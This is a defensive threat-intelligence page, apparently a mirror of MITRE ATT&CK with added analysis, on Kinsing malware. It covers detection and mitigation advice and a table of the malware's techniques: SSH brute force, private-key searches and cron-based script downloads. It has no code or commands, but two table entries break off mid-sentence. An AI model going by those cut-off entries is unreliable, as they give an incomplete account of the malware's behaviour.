S0599: Kinsing
Analyst context for executives and security teams
Kinsing matters because it connects cloud-native compromise to direct operational cost: ATT&CK describes it as Golang-based malware for Containers and Linux that runs a cryptocurrency miner and attempts to spread to other hosts. For leaders, this is not just a malware label; it is a validation point for whether container administration, Linux host monitoring, credential hygiene, and cloud compute cost controls can detect and contain unauthorized resource use before it becomes a resilience or spend issue.
Executive priority
Prioritize Kinsing as a control-coverage test for container and Linux environments. The relationship set points to external remote services, valid accounts, brute force, SSH lateral movement, container administration commands, container deployment, credential discovery, tool transfer, web-based command-and-control, persistence through cron, and compute hijacking. Executives should ask whether the organization can prove visibility across container control planes, Linux hosts, SSH authentication, scheduled tasks, outbound web traffic, and abnormal compute consumption. This also supports audit and compliance evidence around privileged access, workload governance, and incident response readiness.
Technical view
ATT&CK does not provide a dedicated detection section for Kinsing, so SOC and detection teams should validate coverage through the related behaviors. Focus on Containers and Linux: unexpected container administration activity, new or unusual container deployments, shell execution, process and file discovery, cron changes, permission changes, inbound or repeated authentication attempts, SSH use between hosts, access using valid accounts, retrieval of external tools, web-protocol command-and-control patterns, access to shell history or private key locations, and sustained high compute usage consistent with compute hijacking. Treat this as a behavior-chain detection problem rather than a single malware signature problem.
Likely telemetry
- Container control-plane audit logs, including Docker daemon, Kubernetes API server, and kubelet activity where applicable
- Linux process execution and command-line telemetry
- Container creation, image/deployment, and exec activity
- SSH authentication logs and lateral SSH session records
- Remote service authentication logs, including failed and successful attempts
Detection direction
- Build detections around combinations of behaviors: container admin command execution followed by shell activity, tool transfer, cron modification, and sustained compute spikes.
- Validate alerting for unusual container deployments or exec activity, especially where it occurs from unexpected users, service accounts, hosts, or external-facing administration paths.
- Tune SSH and remote-service monitoring for brute force patterns, anomalous successful logins, and lateral movement between Linux or container hosts; account for administrative maintenance windows to reduce false positives.
- Correlate credential-access indicators, such as reads of shell history or private key locations, with subsequent SSH, container administration, or external network activity.
- Monitor outbound web traffic from workloads that do not normally initiate external communications; the ATT&CK relationship to Web Protocols supports attention to C2-like web traffic, but local baselining is required.
Mitigation priorities
- Reduce exposed container and remote administration surfaces; review whether container administration services and external remote services are reachable only from approved management paths.
- Strengthen identity controls for Linux, container, and remote-service access, including least privilege, credential rotation, and review of service accounts that can deploy or administer containers.
- Harden SSH and remote access by limiting where it is enabled, enforcing strong authentication, and monitoring both failed and successful access patterns.
- Apply workload governance for container deployment and execution so unauthorized containers, privileged execution, and unexpected administrative commands are restricted or reviewed.
- Protect secrets and private keys by removing insecure storage, limiting file permissions, and monitoring access to common key and shell history locations.
Analyst notes and limits
The most useful defensive framing comes from the ATT&CK relationships rather than from a Kinsing-specific detection paragraph, which is not provided. Kinsing is described by MITRE as malware for Containers and Linux that runs a cryptocurrency miner and attempts to spread. Its related techniques make it relevant to cloud security, managed detection, identity and access management, incident response, and vulnerability/control prioritization for containerized Linux environments.
No official ATT&CK detection guidance, aliases, labels, or tactics are provided for this object. The take is therefore limited to the official description, platform fields, external references, and the listed technique relationships. Local architecture, logging configuration, exposed services, workload baselines, and identity model are required to determine actual exposure or detection coverage.
Kinsing
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1083 | File and Directory Discovery | Kinsing has used the find command to search for specific files.CitationAqua Kinsing April 2020 |
| Enterprise | T1071.001 | Web Protocols Sub-technique | Kinsing has communicated with C2 over HTTP.CitationAqua Kinsing April 2020 |
| Enterprise | T1610 | Deploy Container | Kinsing was run through a deployed Ubuntu container.CitationAqua Kinsing April 2020 |
| Enterprise | T1078 | Valid Accounts | Kinsing has used valid SSH credentials to access remote hosts.CitationAqua Kinsing April 2020 |
| Enterprise | T1059.004 | Unix Shell Sub-technique | Kinsing has used Unix shell scripts to execute commands in the victim environment.CitationAqua Kinsing April 2020 |
| Enterprise | T1552.004 | Private Keys Sub-technique | Kinsing has searched for private keys.CitationAqua Kinsing April 2020 |
| Enterprise | T1222.002 | Linux and Mac Permissions Sub-technique | Kinsing has used chmod to modify permissions on key files for use.CitationAqua Kinsing April 2020 |
| Enterprise | T1552.003 | Shell History Sub-technique | Kinsing has searched |
| Enterprise | T1110 | Brute Force | Kinsing has attempted to brute force hosts over SSH.CitationAqua Kinsing April 2020 |
| Enterprise | T1021.004 | SSH Sub-technique | Kinsing has used SSH for lateral movement.CitationAqua Kinsing April 2020 |
| Enterprise | T1018 | Remote System Discovery | Kinsing has used a script to parse files like |
| Enterprise | T1133 | External Remote Services | Kinsing was executed in an Ubuntu container deployed via an open Docker daemon API.CitationAqua Kinsing April 2020 |
| Enterprise | T1053.003 | Cron Sub-technique | Kinsing has used crontab to download and run shell scripts every minute to ensure persistence.CitationAqua Kinsing April 2020 |
| Enterprise | T1609 | Container Administration Command | Kinsing was executed with an Ubuntu container entry point that runs shell scripts.CitationAqua Kinsing April 2020 |
| Enterprise | T1105 | Ingress Tool Transfer | Kinsing has downloaded additional lateral movement scripts from C2.CitationAqua Kinsing April 2020 |
| Enterprise | T1057 | Process Discovery | Kinsing has used ps to list processes.CitationAqua Kinsing April 2020 |
| Enterprise | T1496.001 | Compute Hijacking Sub-technique | Kinsing has created and run a Bitcoin cryptocurrency miner.CitationAqua Kinsing April 2020CitationSysdig Kinsing November 2020 |
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.1 | Current bundle | 03e6f5f2ada7… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
Aqua Kinsing April 2020
Singer, G. (2020, April 3). Threat Alert: Kinsing Malware Attacks Targeting Container Environments. Retrieved April 1, 2021.
Open source URL -
[2]
Sysdig Kinsing November 2020
Huang, K. (2020, November 23). Zoom into Kinsing. Retrieved April 1, 2021.
Open source URL -
[3]
Aqua Security Cloud Native Threat Report June 2021
Team Nautilus. (2021, June). Attacks in the Wild on the Container Supply Chain and Infrastructure. Retrieved August 26, 2021.
Open source URL -
[4]
mitre-attack S0599Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.